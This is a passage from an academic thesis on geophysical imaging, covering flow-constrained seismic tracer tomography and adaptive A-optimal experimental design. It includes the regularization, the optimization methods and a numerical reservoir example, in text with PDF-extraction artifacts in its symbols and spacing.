regularization functionals for both the initial modelm0and the velocity\feld u. Following the discretization of the regularization functionals, the initializationand numerical optimization of the resulting non-linear inverse problem is discussed.394.1. Flow constrained geophysical imagingThe chapter concludes with a numerical example, where the initial slowness modeland velocity \feld are recovered and used to forecast the ow of the tracer.4.1 Flow constrained geophysical imagingThe formulation presented in Section 3.2.1 can be thought of as a ow constrainedinverse problem for the case where the velocity \feld u is known. In the case whereone does not know the ow \feld, the following constrained problem can be solved toobtain estimates of both m0and u,minu;m012kXj=0kFmj djk2(4.1a)s.t. mk= T(\u0001tu)mk1; m(0;x) =m0; DIV u = q: (4.1b)Recall Equation (3.4) such that mk= T(\u0001tu)mk1can be written in matrix formfor all times in terms of the initial condition m0as m = A(u)1B(u)m0. Withthe assumption that the dynamics are exact, ie. the noise vector \u0011k= 0;8k, and thedata for all times are given by Equation (3.7), then Equation (4.1) reduces tominu;m012k(IF)A(u)1B(u)m0 dk2(4.2a)s.t. DIV u = q: (4.2b)Minimizing Equation (4.2) under the ow constraints yields a velocity \feld and initialslowness distribution that \fts the tomography data. However, since both the tomog-raphy and ow estimation problems are ill-posed, regularization is needed. HereRow(~u) is de\fned as a regularization functional on the velocity \feld, and Rm(m0)as a regularization functional for the initial slowness.To regularize the ow \feld estimation the following continuous regularization func-404.1. Flow constrained geophysical imagingtional for~u is de\fned:Row(~u) =Z\u000b1ffi(r\u0002~u) +\u000b22w(~x) j~u~urefj2d~x; (4.3)where the \frst term penalizes the curl of the ow \feld and the second term seeks tominimize the di\u000berence between the recovered velocity,~u, and a reference velocity,~uref. The parameters \u000b1; \u000b2> 0 balance the contribution of both terms.The choice to control the curl of the ow in the regularization was made sincethe divergence and the curl complement each other. Given that the divergence ofthe ow \feld is set by the constraint (4.1b) it makes sense to regularize only overits orthogonal complement. The penalty function ffi was chosen by noting that sharpcontrasts in hydraulic properties of di\u000berent rock units are common; for example seethe visualization of the r\u0002~u in the left column in Figure 4.2. Taking the curl of thevelocity \feld~u = Krp with r \u0001~u = q givesr\u0002~u = r\u0002 (Krp) = rp\u0002rK;where kr \u0002~uk = krpkkrKk sin(\u0012):Thus, the curl of the ow \feld has tangential discontinuities where K has jumpsbetween rock types. For the most part the pressure gradient is parallel to rK exceptalong the boundaries of rock types. For example, an aquifer might be surroundedby non porous rock with zero hydraulic conductivity, and thus the cross productalong that boundary will not necessarily vanish. Thus, assuming that K is piecewiseconstant, the curl of the velocity is expected to be sparse.The following convex approximation to the `1-norm is applied to promote the414.2. Discretization of regularization functionalssparsity of the curl of u,ffi(c) =pc2+ \u000f: (4.4)The reference model,~uref, is included in order to incorporate prior informationabout the subsurface. The weighting function w(~x) quanti\fes the con\fdence in~uref;see (Oldenburg and Pratt, 2002). One option to compute~urefis by solving (2.3b)and (2.3c) using a reference conductivity model K0constructed from a priori bore-hole data. In this case, w(~x) is large close to the boreholes and grows smaller as thedistance from the known drill site grows.It was mentioned in Section 2.2 that the di\u000busion term is not included in theadvection-di\u000busion model. Because of this assumption, it is unlikely that the initialtracer model will have di\u000buse edges. Thus, smoothed Total Variation (TV) is usedas the regularization to promote sharp edges in the estimated models (Ascher et al.,2006),Rm(m0) = \fZffi(jrm0j) d~x: (4.5)Finally, the regularization parameters \u000b1, \u000b2and \f should be selected such thatthe data mis\ft is approximately equal to the norm of the noise; a quantity that isin general unknown, (Parker, 1994). Therefore, a cooling strategy starting with largeregularization parameters that are then decreased incrementally until a reasonablysmall data mis\ft is achieved is applied, (see Section 4.6).4.2 Discretization of regularization functionalsThe discretization of the regularization functionals applies standard \fnite di\u000berenceapproximations of the partial di\u000berential operators on orthogonal staggered grids,following the discretization of the tomography experiment and the ow equations424.2. Discretization of regularization functionalsoutlined in Chapter 2.To discretize the curl of the ow \feld~u, Stoke's theorem is used,ZSr\u0002~u \u0001 n^dS =I~u \u0001 d; (4.6)where, n^ is the unit normal vector to the surface dS, is the path around the surface,and d is the in\fnitesimal path length.The discretization of the curl operator follows (Haber and Ascher, 2001; Moder-sitzki, 2009), such that the discrete curl operator is de\fned byCURL =\u0012dl2l2+1Il1Il2dl1l1+1\u0013: (4.7)Here dll+12 Rl\u0002l+1is again a short \fnite di\u000berence matrix. Note that the CURLoperates from the cell faces to the nodes. For a complete derivation of the matricessee (Haber and Ascher, 2001; Modersitzki, 2009).The integral in Equation (4.3) is discretized using a midpoint rule, resulting inthe discrete regularization,Row(u) = \u000b1h2e>Acnffi(CURL u) +\u000b2h22(u uref)>W (u uref); (4.8)where the matrix Acnaverages from nodes to cell-centers, h is the cell length, ande 2 RMis a vector of ones.Next, the regularization functional for the initial slowness is discretized. Notingthat m0is discretized on a cell-centered grid, a standard discrete approximation forthe smoothed total variation regularization is applied (Ascher et al., 2006)Rm(m0) = h2e>qAcf((GRAD m0)\f (GRAD m0)) + \u000f; (4.9)434.3. Numerical optimizationwhere \f is the Hadamard product, and GRAD is a standard 2-point discretizationof the gradient of a cell-centered variable which maps from cell-centers to faces, asdescribed in (Ascher et al., 2006; Haber and Ascher, 2001). Acfis an averaging matrixfrom cell-faces to cell-centers. Note that the notation is somewhat abused, and thathere the square root of a vector is the point-wise square root.Now that the regularization functionals have been established and discretized, theoptimization methods are discussed in the following section.4.3 Numerical optimizationIn this section the approach to solving the ow constrained discrete optimizationproblem is outlined. A variable projection method is chosen to solve for the initialslowness and velocity \feld in turn. Because the TV regularization is used for m0theobjective function is non-linear with respect to m0, and thus a primal-dual Newtonmethod (Chan et al., 1999) is applied. To estimate u an approximate SequentialQuadratic Programming (SQP) method is utilized, (see Nocedal and Wright (2000)for further details).The discrete form of the coupled variational optimization problem (4.2) for u andm0with the discrete regularization functionals is given by,minu;m012k(IF)A(u)1B(u)m0 dk2+Row(u) +Rm(m0) (4.10a)s.t. DIV u = q: (4.10b)There are a number of options for the solution of such problems. One option is tosolve the problem directly with respect to u and m0. This approach has a num-ber of disadvantages. First, it requires solving a large coupled problem where the444.3. Numerical optimizationparameters may have di\u000berent scales. Second, it does not take advantage of theexisting ability to solve the decoupled problems e\u000eciently. Finally, solving the cou-pled problem requires the simultaneous evaluation of two regularization parameters.An alternate, more attractive option is to use a variant of the variable projectionmethod (Golub and Pereyra, 2003). This method was applied successfully in (Chunget al., 2006) for solving the related super-resolution problem. Furthermore, it hasbeen shown in (Chung, 2009) that it is possible to choose regularization parametersfor the di\u000berent variables in the algorithm separately, thus decoupling the problemof selecting regularization parameters. The variable projection method as applied tothe tomography-ow optimization problem is as follows.First, assuming u to be \fxed, the conditions for a minimum with respect to m0areG(u)>(G(u)m0 d) +rm0Rm(m0) = 0; (4.11)where G(u) = (IF)A(u)1B(u). In the standard variable projection method,where quadratic regularization is used, Equatin (4.11) is linear with respect to m0and therefore can be solved directly. In this application the equation is nonlineardue to the TV regularization applied to m0. Nonetheless, it is possible to solve thisproblem rather quickly using, for example, a primal-dual Newton method (Chan et al.,1999).Assuming thatm0solves Equation (4.11), thenm0=m0(u) and the optimizationproblem can be rewritten as a problem for u aloneminu12kG(u)m0(u) dk2+Row(u) +Rm(m(u)) (4.12a)s:t: DIVu = q: (4.12b)454.3. Numerical optimizationIntroducing the Lagrange multiplier \u0015, the Lagrangian L(u;\u0015) of the problem isL(u;\u0015) =12kG(u)m0(u) dk2+Row(u) +Rm(m0(u)) + \u0015>(DIVu q): (4.13)An important observation made in (Golub and Greif, 2003) was that if m0solvesthe system Equation (4.11) thenruL(u;\u0015;m0(u)) =@L@u+@L@m0@m0@u=@L@u;because Equation (4.11) implies that@L@m0= 0 and thus m0can be treated as aconstant in the objective function.This observation leads to the following conditions for a minimumJ(u)>(G(u)m0(u) d) +ruRow(u) + DIV>\u0015 = 0 and DIVu = q; (4.14)where J(u) is the Jacobian (sensitivity) of the data mis\ft term with respect to u. Tocompute the Jacobian the mis\ft is rewritten as,D(u) =12r(u)>r(u);where r(u) := (IF)A(u)1B(u)m0 d and J(u) =@r@u:Using (3.4) to simplify notation, and recalling the de\fnitionm = A(u)1B(u)m0,the Jacobian is then@r(u)@u= (IF)@m(u)@u: (4.15)In order to di\u000berentiatemwith respect to u, Equation (3.4) is implicitly di\u000berentiated,464.3. Numerical optimizationyielding@(A(u)m)@u+A(u)@m(u)@u=@(B(u)m0)@u: (4.16)For the computation of the derivatives of A(u)m and B(u)m0only the push forwardoperator times the ithmodel, T(u)mi, needs to be di\u000berentiated for indexes i =1; : : : ; n. These derivatives depend on the employed interpolation basis functions.Di\u000berentiating the product T(u)miwith respect to u has been done in (Chung et al.,2006). Furthermore, since the interpolation matrix is sparse, the derivative matrices@(A(u)m)@uand@(B(u)m0)@uare sparse.To summarize, Equation (4.16) was solved for the derivative of m with respectto u and substituted into Equation (4.15) to obtain the derivative of the residualfunction r(u) asJ(u) =@r(u)@u= (IF)A(u)1\u0012@(B(u)m0)@u@(A(u)m)@u\u0013: (4.17)An important observation needs to be made here. While the matrix J(u) is densein general, its product with a vector can be computed e\u000eciently using sparse matrixtechniques. To calculate J(u) times an arbitrary vector z one \frst computes thematrix vector producty =\u0012@(B(u)m0)@u@(A(u)m)@u\u0013z:Since this matrix is sparse the computation can be done e\u000eciently. Next, the solutionx = A(u)1y is obtained by solving the linear systemA(u)x = y:474.3. Numerical optimizationSolving this linear system is equivalent to solving a single ow forward problem, thatis, advection in time. Finally, the matrix F is also sparse and thus computing thematrix vector product, (IF)x can also be done quickly and e\u000eciently.To complete the computation of the derivatives the di\u000berentiation of the regular-ization term is now discussed. It is straight forward to verify that@Row@u= \u000b1CURL>diag(1=ffi(CURLu))CURLu; (4.18)where the notation 1=ffi is a vector that is divided point wise.Given all the components described above the goal is to now solve the discreteoptimization problem. There are a number of options for the solution of the problem.Here an approximation to the Sequential Quadratic Programming approach (SQP) isapplied. By linearizing the system in (4.12) and using a Gauss-Newton approximationof the Hessian with respect to u the following linear system is obtained,0B@J>J+ \u000b1CURL>diag(1=ffi(CURLu))CURL DIV>DIV 01CA0B@\u000eu\u000e\u00151CA= 0B@LuL\u00151CA: (4.19)This system is solved for \u000eu and \u000e\u0015 and a soft (backtracking) line search is used forthe update of u and \u0015 (Nocedal and Wright, 2000).To solve the linear system (4.19) note that the system has many similarities tothe Stokes problem with a positive-semi de\fnite (1,1) block, as outlined in Goluband Greif (2003). Such systems can be solved by a combination of the augmentedLagrangian method and an approximation to the Schur complement (Benzi et al.,2005).484.4. Initialization4.4 InitializationThe optimization problem given by Equation (4.10) is a nonlinear non convex prob-lem that without an appropriate initialization will result in solutions of low quality.Therefore an initialization methodology is used that cheaply yields a \\reasonable\"starting point.To this end, consider the decoupling of the imaging of the slowness for all times.That is, consider the individual problemsFmk+ \u000f = dk; k = 1; : : : ; n:Inverting each data set to obtain n initial estimates of mkis accomplished by solvingn decoupled optimization problems;bmk= argminmk12kFmk dkk2+Rm(mk); k = 1; : : : ; n: (4.20)Given the estimates ofbmkan estimate of the initialization velocity is computed bysolving the optimization problembu = argminu12kA(u)mB(u)m0k2+Row(u): (4.21)This estimate is equivalent to obtaining a ow estimate without improving m, whichin this experiment leads to a good initial guess for both the slowness and velocity.In the following sections the approach to jointly estimate the initial slowness andthe velocity \feld are presented for a small numerical example. The results show thatthe recovered ow \feld and reconstructed initial slowness can be used to predict theow of an injected tracer within the subsurface.494.5. Experimental setup4.5 Experimental setupThe computational domain, = [0; 100]\u0002[0; 200] meters, is divided into l = [200; 100]cells of width h = [1; 1]. The ground truth conductivity model consists \fve layers,with conductivities ranging between 10 and 1000 m3\u0001day=kg. The ground truth modelis picture in the top panel of Figure 4.1. Two boreholes are used for the injectionand extraction of uids. A reference conductivity model was constructed by linearinterpolation of the borehole data. The reference conductivity model is a simplelayer of high conductivity (k = 1000m3\u0001 day=kg) surrounded by a background layer(k = 10m3\u0001day=kg). Both the true and reference conductivity models are pictured inFigure 4.1. The ground-truth initial tracer mgtis a piece-wise constant model withtwo regions of concentration 0.5 and 1; see top left plot in Figure 4.2. Fluid is injectedfrom the left well at 50 m depth and extracted on the right well at 60 m depth witha static pumping rate of \u0006100 m3= day.Given the hydraulic conductivity model and the source term, the ground-truthow \feld ugtand the reference ow \feld urefare obtained by solving Equation (2.3);see quiver plot in Figure 4.1. Tomography travel-time data are simulated by solvingthe forward problem given by Equation (3.7) for mgtand urefand adding Gaussianwhite noise with a standard deviation ff = 0:5. The tomography experiment consistsof ns= nr= 35 transmitters and receivers equally spaced from 20m to 100m depthalong the left and right boundary of the domain, respectively. Data were simulatedfor 15 days with a time step \u0001t = 1 day. Snapshots of the advection of the tracer canbe seen in the \frst column of Figure 4.3.4.6 Sequential reconstruction as initializationTo obtain a starting guess of the ow \feld and the initial slowness m0, the proce-dure outlined in Section 4.4 is applied. First, the slowness evolution is individually504.6. Sequential reconstruction as initializationground truth hydraulic conductivityreference hydraulic conductivity 1002003004005006007008009001000Hydraulic conductivity (m3 day/kg)Figure 4.1: Visualizations of the ground true and reference hydraulic conductivitymodels and associated ow \felds. The true and reference models are discretized ona 100 \u0002 200 cell grid on a domain of 100m depth by 200m across. A static source,at 55m depth on the left border, and a sink, at 65m depth on the right border ofthe domain, are indicated by red. The reference model is a simpli\fed model whichinterpolates borehole data between the two wells.514.6. Sequential reconstruction as initializationm0true model initialization coupled estimate uuyuxCURL uFigure 4.2: Visualization of ground truth data for the domain with dimensions 100m(y direction) depth and 200m (x direction) across (\frst column), individual recon-struction (second column) and results of the joint reconstruction approach. The \frstrow visualizes the initial slowness (m0). The second shows a quiver plot of the recov-ered velocity \feld (~u). The components of the velocity \feld [ux; uy] are pictured inthe third and fourth row and the last row shows the curl of the velocity \feld (r\u0002~u).Note that there is almost no ow in the y direction, and that at the boundaries ofthe reservoir there are non-zero values of the curl of~u524.6. Sequential reconstruction as initializationday 1true model initialization coupled estimateday 10day 15day 25day 35Figure 4.3: The evolution of the tracer is pictured for the ground-truth (left column),individual reconstruction used for initialization (middle column), and the proposedjoint reconstruction. The tracer evolution is simulated for 40 days with the respectiveinitial slowness and ow \feld. The front of the ground truth tracer is visualized bydashed lines for the \frst 3 rows. Note that the joint method results match the groundtruth tracer front to a greater degree than the predictions from the initializationestimates.534.7. Joint reconstructionreconstructed for all 15 days solving Equation (4.20) using a standard Gauss-Newtonmethod with a regularization parameter \f = 0:4. Subsequently, a ow estimate bu wasobtained by solving Equation (4.21) using the described SQP method with regular-ization parameters \u000b1= 103and \u000b2= 4 \u0001 103. The regularization parameters werefound using a cooling strategy which starts with large parameters that are decreasediteratively until the measurement noise became visually too prominent in both thereconstructed images and the estimated ow \felds.A larger bias towards the reference ow \feld, uref, is given close to the boreholesby using the weighting function w(x1; x2) = (x2 100)2=1002.Estimates of the initial slowness and ow \feld are visualized in the second columnof Figure 4.2. The \frst row shows the reconstruction of the initial slowness, estimatedby inverting the tomography data of the \frst day. The ow \feld estimate, visualizedin the second, third, forth, and \ffth rows; in a quiver plot, component wise and by itscurl, captures the main characteristics of the ground truth. However, the magnitudeof the velocity \feld is small compared to the ground truth. This can be seen bylooking at the plots of uyand in the second column of Figure 4.3, where the frontof the high concentration plume is behind the ground truth. This demonstrates theimportance of using the ow to better guide the imaging which in turn yields moreaccurate ow predictions.4.7 Joint reconstructionTo improve the estimates ofm0and the velocity \feld, the coupled tracer tomographyinverse problem (Equation (4.1a)) is solved. The regularization parameters wereadjusted to \u000b1= 5 \u0002 103; \u000b2= 7 \u0002 104and \f = 200. The result of the individualestimate of bu, was used as a starting guess for the optimization and ureffor thereference model.544.8. ForecastingSince errors in the ow \feld accumulate in time, an outer loop is used to introducethe tomography data sequentially as the reconstruction of the velocity \feld improves.To be precise, only the tomography data from the \frst day is used in the estimationproblem for m0, and then ow \feld is estimated by solving Equation (4.12) using theSQP method outlined earlier. Afterwards the estimate m0is updated by introducingtomography data from one additional day and updating the estimate of u. In total,\fve outer iterations are performed using tomography data from the \frst six days.Note that all tomography data is used in the ow estimation at all iterations. Itis important to note that computational time increases with the coupled recoverymethod since it requires solving the System (4.19) in addition to the imaging step.The initial slowness and velocity \feld reconstruction results are visualized in thethird column of Figure 4.2. Note the signi\fcant improvement in the reconstructionof m0, particularly the sharpening of the edges.4.8 ForecastingThe numerically estimated ow \felds and initial slowness are used to forecast theevolution of the tracer beyond the \frst 15 days by solving the forward ow model inEquation (2.9) for 35 days. The numerical solutions of the initialization and the jointhistory matching problems are compared to the ground-truth in Figure 4.3.In the considered application, the most interesting quantity is the prediction ofthe arrival time. The front of the tracer is thus visualized by a dashed line in thesubplots. It can be seen that the coupled estimate of u and m improves the predictionof the arrival time when compared with the estimates obtained in the initialization.554.9. Summary4.9 SummaryThis chapter presented a new method for the estimation and prediction of tracer owin porous media given seismic tomography geophysical data. The new coupled methodwas formulated as a ow constrained inverse problem to estimate both the initialseismic slowness and the velocity \feld in which tracer is injected. As a consequenceof the coupled ill-posed inverse problem, a novel regularization for the velocity \feldwas additionally constructed to promote discontinuities at rock property interfaces.The coupled method was demonstrated for the model borehole seismic tomographysurvey of tracer advection. The numerical results were compared with numericalresults obtained through a decoupled process and demonstrate that this new coupledapproach yields not only accurate reconstructions of the initial slowness and ow \feld,but, especially, accurate predictions of the uid ow velocity and tracer evolution.In addition to coupling the ow and geophysics, the next approach to improv-ing reservoir monitoring is to consider what data are collected as the tracer movesthrough the subsurface. This optimal experiment design question is investigated inthe following chapter.56Chapter 5Dynamic optimal experimentaldesignThe previous chapter presented a new joint method for estimating the initial slownessm0, the velocity \feld u, given all previous seismic tomography data sets for the reser-voir monitoring experiment outlined in Chapter 2. Although this method alleviatessome of the uncertainty and expense involved in reservoir monitoring programs bymaking use of geophysical data instead of sparse uid measurements, it is possiblethat the tomography data set could be reduced while maintaining an optimal estima-tion of the initial slowness. In this chapter, the idea is therefore to reduce the numberof necessary tomography data measurements in an optimal way. This is commonlyknown as optimal experimental design.The optimal design method will generate an experiment with a reduced numberof measurements while maintaining the best estimate of the initial slowness, incorpo-rate the historic tomography data sets, and couple the ow dynamics such that theexperimental design adapts with the moving tracer. For the formulation of the designmethod, the assumption is made that dynamics are well known, that is, it is assumedthat~u is known, or estimated to reasonable accuracy for forecasting.The new approach, de\fned as adaptive optimal experimental design, applies amethod similar to classic A-optimal design criteria, by minimizing the adapted meansquare error (amse) of a regularized model estimate, instead of the mean square575.1. Adaptive experimental designerror (Atkinson and Donev, 1992; Fedorov, 1972). The adapted mean square erroris de\fned by introducing a monitor function which scales the mean squared erroraccording to historic model estimates.This chapter introduces the adaptive design method from \frst principals, thenumerical optimization of the resulting design objective function, and discusses theresults for the tomography tracer advection reservoir model example.5.1 Adaptive experimental designTo introduce the adaptive experimental design method it is necessary to understandA-optimal design criteria from \frst principals. To begin, consider only two measure-ment vectors of the formF1m+ \u000f1= d1and F2m+ \u000f2= d2; (5.1)where F1is the forward tomography operator at time t1and F2is the forward operatorat time t2. As before, the measurement error vectors \u000fkare assumed to be normallydistributed uncorrelated noise, \u000fk\u0018 N(0;W1k), with zero mean and a diagonalcovariance matrixW1k, for k = 1; 2.At this point consider only the static case, where the goal is to design the exper-iments at times t1and t2such that the \\best\" recovery of m is obtained by somecriteria, such as minimizing the Tikhonov optimization problem. This scenario \ftsthe problem where the dynamical system is \\exact\" (containing no noise as in Sec-tion 3.2.1) and m represents the dynamical system parameters, such as the initialcondition of the tracer in the reservoir modeling experiment.Two di\u000berent designs can be considered. First, it is possible to perform a-prioridesign, that is, to design the experiments F1and F2prior to the data collection.585.1. Adaptive experimental designThis is the case when the time between t1and t2is much shorter than the timefor the processing of the data. A second approach is to use post-priori design. Theidea here is to use the results obtained from the \frst experiment in order to designa \\better\" second experiment. The goal is to \frst obtain an a-priori design for the\frst experiment and then, after the data is collected and processed, use the estimatorobtained at t1in order to design the data collection at time t2.Before discussing the design of the data acquisition for time t2, it is necessaryto review the a-priori design of the experiment at time t1. Consider the regularizedestimation of m given d1, accomplished by solving the following penalized-weightedleast squares (Tikhonov regularized) optimization problembm1= argmin12kF1m d1k2W1+\u000b2kL(mbm0)k22; (5.2)whereW1= diag(w1) is a matrix of inverse variances, that is, the inverse covarianceof the noise, L is a smoothing penalty matrix,bm0is the current estimate of the modelprior to having data, and \u000b is a regularization parameter. Recall from Chapter 3 thatfrom the Bayesian perspective,bm0can be considered the mean of a prior probabilitydistribution with covariance matrix (L>L)1. Minimizing Equation (5.2) yields theestimatorbm1= (F>1W1F1+ \u000bL>L)1(F>1W1d1+ \u000bL>Lbm0): (5.3)De\fning the matrix C = (F>1W1F1+ \u000bL>L), and recalling that F1m+ \u000f1= d1theerror in the recovery can be written asbm1m = C1F>1W1F1m+C1F>1W1\u000f1+ \u000bC1L>Lbm0(5.4)+ (\u000bC1L>Lm \u000bC1L>Lm)m:595.1. Adaptive experimental designCollecting terms and using the de\fnition of C gives,bm1m = C1F>1W1\u000f1+ \u000bC1L>L(bm0m): (5.5)Squaring and taking the expectation over \u000f1and recalling that \u000f1\u0018 N(0;W11), themean square error is then given bymse(w1;m) = Ekbm1mk22= trace[F1C2F>1W1] + \u000b2EkC1L>L(bm0m)k22:(5.6)Taking the Bayesian point of view assumes thatmbm0is Gaussian with a zero meanand a covariance matrix (\u000bL>L)1such that the mean squared error is equivalent tothe Bayesian risk.mse(w1) = ffi1(w1) = trace[C2F>1W1F1] + \u000btrace[C2L>L]: (5.7)Finally, using the linearity of the trace and the de\fnition of C results inffi1(w1) = traceh(F>1W1F1+ \u000bL>L)1i: (5.8)That is, the Bayesian risk is the trace of the inverse precision matrix, or trace of theposterior covariance matrix; a well known result.The goal of the design problem seeks to obtain a better estimate form by assumingthat the (inverse) variances, w1, of the collected data can be controlled in some way.By controlled, it is assumed that a data measurement is accompanied by a s-tandard deviation determined by the instrumentation. If this is not the case, severalmeasurements at a particular location can be conducted to estimate the error. Similartreatment is given in (Alexanderian et al., 2014; Haber et al., 2008, 2010, 2011) where605.1. Adaptive experimental designthis point is further discussed. In this way, through optimization, the weights wiareestimated prior to the actual data collection, and a measurement dithat is assignedwith in\fnite standard deviation (wi= 0), or zero variance, by the optimization isthus not collected.To estimate the variances, the Bayesian risk ffi1(w1) is minimized with respectto w. Additionally, since the goal is to obtain a sparse design (that is, collect onlya few measurements) an additional cost on w1is added. This cost is equivalent tothe 1-norm of w and promotes its sparsity (see (Alexanderian et al., 2014; Haberet al., 2008) for further discussion), resulting in the following optimization problemwhich balances the minimization of the mean squared error (mse) and the cost of theexperiment (Haber et al., 2008),ffi\f1(w1) = traceh(F>1W1F1+ \u000bL>L)1i+ \fe>w1; 0 \u0014 w1;i; (5.9)where e>is a vector of ones.Consider now using the design problem of estimatingm given the estimated modelbm1. One could rewrite the recovery problem in a similar way, that isbm2= argmin12kF1m d1k2W1+12kF2m d2k2W2+\u000b2kL(mbm0)k22; (5.10)which leads to the estimatebm2(w2) = (F>1W1F1+ F>2W2F2+ \u000bL>L)1(F>1W1d1+ F>2W2d2+ \u000bL>Lbm0):(5.11)Note that w1is assumed to be \fxed and therefore the new estimate is a function ofw2alone. If the steps above are repeated then the A-optimal design for time t2yields615.1. Adaptive experimental designthe minimization of the functionffi\f2(w2) = traceh(F>1W1F1+ F>2W2F2+ \u000bL>L)1i+ \fe>w2; 0 \u0014 w2;i: (5.12)At this point it is worth pausing for a moment and noting an important feature ofthe experimental design criteria. The design criteria do not depend on the data. Thisobservation is true for any of the design criteria (that is, C,D and E designs)(Fedorov,1972). Furthermore, it is easy to verify that any linear estimator of the data yields acovariance matrix that is independent of d1. This implies that using current designcriteria does not make use of the estimated model obtained at time t1to obtain abetter estimate at time t2.In order to use the information obtained at time t1for the design of the experimentat time t2the concept of adaptive design is presented.Assume that the model,bm1has some \\interesting\" features and some \\boring\"features. To be more speci\fc, assume that the di\u000berence\u000e1= jbm1bm0j (5.13)is small in some norm over a region and large in others. The goal then is to betterestimate the new features that appear in the model.To this end, the monitor function, fi (\u000e) is introduced to measure the change inthe model. For example, to start, consider the functionfi = \u000e; (5.14)that simply measures the change in the estimator compared to the previously knownestimator. A di\u000berent function that was found to be useful in numerical experiments625.1. Adaptive experimental designisfi = \u001f\u0012(\u000e); (5.15)where \u001f\u0012is a smoothed characteristic function. In this case the optimization focusesonly on areas where \u000e is large and does not sample areas where \u000e is small.Given the monitor function, rather than minimizing the mean square error, theidea is to minimize the adaptive mean square error (amse), de\fned byamse(w2;m) = Ekbm2mk2fi1= E[(bm2m)>diag(fi1)(bm2m)]: (5.16)The idea behind the amse is to obtain a tighter bound on the model where theestimator exhibits large changes compared to the known a-priori estimator.Starting from Equation (5.4), modifying it to deal with the amse, and repeatingthe calculation above, the expectation over the amse isffi2(w2) = tracehdiag(fi1)(F>1W1F1+ F>2W2F2+ \u000bL>L)1i: (5.17)Similar to the non-adaptive case, the adaptive design is computed by minimizing the(penalized) function ffi2(w2).The above concept can easily be extended to any number of time steps. Considerk 1 experiments that are conducted at times t1; ::tk1using the forward operatorsF1; : : : ;Fk1and assume that the goal is to design an experiment for the problem attime tk. The design criteria in this case readsffi\fk(wk) = trace24diag(fik1)\u0010kXj=1F>jWjFj+ \u000bL>L\u0011135+ \fe>wk; 0 \u0014 wk;i;(5.18)635.2. Design for dynamical systemswhere fik1is the monitor function that measures the di\u000berence between the modelestimated at time tk1and the model estimated at time tk2.5.2 Design for dynamical systemsThe previous section presented a formulation for adaptive A-optimal experimentaldesign that assumes the model, m is static. This section therefore addresses the casewhere the model is governed by a (potentially noisy) dynamical system.Recalling Chapter 3 and the system of Equations (3.1), the adaptive optimaldesign method is applied for both cases, where the dynamic tracer advection modelis assumed to be exact or inexact. Note that in these cases the velocity \feld u isassumed to be known.5.2.1 Exact dynamicsConsidering the data vector given by Equation (3.6) in Chapter 3, and noting thatthis case is exactly the case described in the previous section, the amse criteria canby directly applied.Given the assumption that there is no error, the estimation of the initial modelm0given k data sets isbm0;k= argmin12kXj=1kFjm0 djk2Wj+\u000b2kL(m0bm0)k22: (5.19)and therefore the design function is identical to Equation (5.18)ffi\fk(wk) = trace24diag(fik1)\u0010kXj=1F>jWjFj+ \u000bL>L\u0011135+ \fe>wk; 0 \u0014 wk;i:(5.20)645.2. Design for dynamical systems5.2.2 Inexact dynamicsTo address the case where the dynamics are inexact recall Equations (3.11) and (3.12),which correspond to the noise vectors for the tomography imaging experiment andthe tracer dynamics model.In order to apply the amse method the problem is formulated as in Kalman s-moothing (Aravkin et al., 2013; Kalman, 1960). A similar approach that maximizesthe information gain was presented in (Gharamti et al., 2015) for the ensemble Kalman\flter.Recalling that the noise vector \u0011k\u0018 N(0;Qk), and assuming that all Qkareknown, that is, that the dynamics are not changing in time, all modelsbmk=(bm>0; : : : ;bm>k)>are estimated by minimizing Equation (3.13) presented in Section 3.2.2,bmk= argmin12(IF)mk dk2Wk+12T mk2Q1k+\u000b2k(IL)mkk22;such that,bmk=\u0010(IF>)Wk(IF) +T>Q1kT+ \u000bIL>L\u00111(IF>)Wk(IF)dk;(5.21)whereWk= diag(w0; : : : ;wk), and Q1k= blkdiag(Q11; : : : ;Q1k).It is assumed in this case that the \frst experiment d0, will either be conductedsuch that all data are collected, or will be conducted in a naive way. In either case itis assumed that the initial experimental design,W0= diag(w0), is known or can bedesigned for as was suggested in previous work (Haber et al., 2011).In a straightforward extension of the previous section, the amse design optimiza-655.3. Numerical optimizationtion function for a design at time tkis then\b\fk(wk) = trace\u0014diag(\u0016fik)\u0010(IF)>Wk(IF) +T>Q1kT+ \u000bI(L>L)\u00111\u0015+ \fe>w;0 \u0014 wk;i: (5.22)where\u0016fik= (fi0(bm0); : : : ; fik(Tbmk1)).It is assumed here that all previous experiments 0; : : : ; k 1 have already beenconducted. Therefore, solutions are only for the current time point tk. At this point,bmkis not known. To predictbmkat time tkthe previous estimator is propagatedahead in time,bmk\u0019 Tbmk1.The two formulations of the adaptive design method for a dynamical system yieldtwo di\u000berent numerical optimization problems. However, in the limit that all Qk!0, the inexact optimization problem reduces to the exact formulation, see (Nocedaland Wright, 2000) for a discussion of penalty methods. The numerical optimizationtechniques for the solution of these problems are discussed in the following section.5.3 Numerical optimizationThis section presents the calculation of the gradients required to solve the designoptimization problems for both the exact and inexact tracer dynamics.5.3.1 Exact dynamicsFinding an optimal design for time step k requires the minimization of the objectivefunctional given by Equation (5.20), which involves computing the trace of a largedense matrix. Typically, when solving geophysical problems, the size of matrices canbe on the order of millions. Thus, forming and storing these matrices is memory andcomputationally intense.665.3. Numerical optimizationIn the non-linear optimization algorithm, at each iteration the computation of theobjective function and its gradient is required. In order to avoid numerous expen-sive calculations while storing and manipulating large dense matrices, a stochasticHutchinson trace estimator is applied to approximate the trace (Haber et al., 2011;Hutchinson, 1990). By doing so, the objective function reduces to matrix vectorproducts which can be carried out much more e\u000eciently.If the vectors v1; : : : ;vmare independent and each with independent entries takingthe values of 1 and 1 with equal probability, then the stochastic trace estimator ofthe trace of a matrix H is given bytrace(H) \u00191mmXi=1v>iHvi:Applying the trace estimator for m = 1, Equation (5.20) becomesffi\fk(wk) = v>diag(fi )\u0010F>kWkFk+G\u00111v + \fe>wk; (5.23)where e is a vector of ones, G =Pk1j=1F>jWjFj+ \u000bL>L, and v is a random vectorwith equally distributed values of 1 and 1.Note that computing the the gradient of ffi\fk(wk) involves computing the gradientof an inverse matrix. This computation is carried out by de\fning z such thatz = (F>kWkFk+G)1v , (F>kWkFk+G)z = v; (5.24)recalling thatWk= diag(wk), and di\u000berentiating implicitly to obtain thatF>kdiag(Fkz) + (F>kdiag(wk)Fk+G)J = 0: (5.25)675.3. Numerical optimizationSolving for the Jacobian J =dzdwkresults in,J = (F>kdiag(wk)Fk+G)1F>kdiag(Fkz): (5.26)Substituting J back intorffi\fk, transposing, de\fning the matrixC = F>kWkFk+G,and the vectors, y and z by,Cz = v and Cy = fi \f v;yields the gradient of the design function,rffi\fk(wk) = (Fkz)\f (Fky) + \fe; 